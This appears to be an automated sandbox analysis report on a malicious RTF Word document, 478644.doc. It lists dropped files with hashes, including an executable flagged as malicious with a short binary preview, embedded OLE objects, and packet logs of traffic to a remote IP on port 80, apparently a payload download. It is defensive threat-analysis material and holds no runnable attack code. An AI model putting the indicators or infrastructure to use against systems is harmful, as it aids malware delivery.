                                                          SHA-256:612DDD432589CB1586BEE2B9173D880A3E1FDBA888D40DB2D8D8F6AE9A96E186
                                                          SHA-512:0D5CC6582ECCF2E8CC0E1B19CBEB72AC621306D1DABB3BCD89B09BBE309D00788EE3858E9607FBA56456EC354C3B0D9E87BC10F94B36994F61ECC3ED546B6743
                                                          Malicious:false
                                                          Preview: [folders]..Templates.LNK=0..478644.LNK=0..[doc]..478644.LNK=0..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:false
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2
                                                          Entropy (8bit):1.0
                                                          Encrypted:false
                                                          SSDEEP:3:Qn:Qn
                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                          Malicious:false
                                                          Preview: ..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms2E (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msio (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FQ6733LFPKS74NKOVPFM.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O2GRPLQKV4A3U7C26MID.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TM4WFGYHJ2HGTOWTIN9Q.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\okcff.exe
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):194560
                                                          Entropy (8bit):4.668942832070624
                                                          Encrypted:false
                                                          SSDEEP:1536:QLwio+gEPHeB9PYR0uQ7nXhMM70iOVcse5m6h:rt+gIHeB9PYRnQL6S5
                                                          MD5:E9416A322E9A796D45588BC4FB04CD45
                                                          SHA1:8D261D205C8D34A4A24B713DD6B9585647B8BDEB
                                                          SHA-256:F2DA177AFF59093ABE1D3BC7C1A769BE2701784036C398900A43725D83C9E9A9
                                                          SHA-512:9A1FF2B39DFD93D3B6EAED4685876E8BF877BD1695FDC7095B74ABEADAFBAEE785815FEB75585D31299B3D0A18B5E88890DA942D65F407171C28CAF66655C5AE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y................0..T..........Ns... ........@.. .......................@............@..................................s..K.......X.................... ....................................................... ............... ..H............text...TS... ...T.................. ..`.rsrc...X............V..............@..@.reloc....... ......................@..B................0s......H........B.../..........Hr...............................................0...........r...p(....(.....(......(.....*..0..Q....... ......$.8......$.E........................S...............c...........^...........7...>...2...................(...................[...........m...8.....8M... ....~_...:....& ....8......(.E........q.......^...8............io....8......./(....:8... ....8......,.....(....(.....* ....~h...9....& ....8...../(....t......8....(.....*(...... ....~....9]...&
                                                          C:\Users\user\Desktop\~$478644.doc
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:true
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                          Static File Info

                                                          General

                                                          File type:Rich Text Format data, unknown version
                                                          Entropy (8bit):3.602985307524326
                                                          TrID:
                                                          • Rich Text Format (5005/1) 55.56%
                                                          • Rich Text Format (4004/1) 44.44%
                                                          File name:478644.doc
                                                          File size:392070
                                                          MD5:c0f8f2fc481e9be7141d84b401edf1f7
                                                          SHA1:ab1dbe841b083ea886c9023307c0527f7bfbfff3
                                                          SHA256:4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
                                                          SHA512:215ace87d1af8847a40c2b8763230e1004c0c2b2f1cc842ddcb0fe73d7f2238c0fa024be82380c5135d55b5585d6d86e6619f59f36e5f43696d9bb1591784d77
                                                          SSDEEP:1536:inHYJDDDDDDDDtdLZvR0y0FC7Qqofroy41hzO9lca57hKfhdzFz76mAg5eeVhMDU:iYDDDDDDDDjoUdzFtr5RDAw5wfo
                                                          File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                                          File Icon

                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                          Static RTF Info

                                                          Objects

                                                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                          0000007CDh2embeddedpackage97076abdtfhgXgeghDp.ScTC:\nsdsTggH\abdtfhgXGeghDp.ScTC:\CbkepaD\abdtfhghgeghDp.ScTno
                                                          100031D7Ah2embeddedOLE2LInk2560no

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 14, 2022 10:23:17.968811989 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:17.995575905 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:17.995758057 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:17.996404886 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.023190022 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024344921 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024382114 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024405003 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024426937 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024430990 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024451971 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024465084 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024475098 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024492979 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024496078 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024511099 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024519920 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024549961 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024666071 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024691105 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024725914 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024754047 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.032021999 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051234007 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051270008 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051295042 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051320076 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051333904 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051345110 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051366091 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051371098 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051373005 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051374912 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051398993 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051424026 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051436901 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051451921 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051457882 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051465988 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051505089 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051527977 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051553965 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051578045 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051578999 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051592112 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051635027 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051668882 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051695108 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051718950 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051729918 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051752090 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051757097 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051820993 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051853895 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051867962 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051877975 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051894903 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051903963 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051913977 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051945925 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.052258968 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.052330971 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.052876949 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078186035 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078212976 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078226089 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078238964 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078257084 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078288078 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078294039 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078342915 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078356981 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078391075 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078397989 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078434944 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078453064 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078470945 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078475952 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078489065 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078495026 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078510046 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078525066 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078588963 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078607082 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078624964 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078632116 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078641891 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078648090 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078661919 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078679085 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078778028 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078795910 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078814030 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078819036 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078833103 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078834057 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078851938 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078869104 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078922987 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078941107 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078958988 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078967094 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078975916 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078980923 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078998089 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079016924 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079124928 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079144955 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079164982 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079164982 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079180002 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079181910 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079196930 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079214096 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079296112 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079315901 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079334021 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079344034 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079351902 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079355001 CET4916780192.168.2.2237.0.9.166
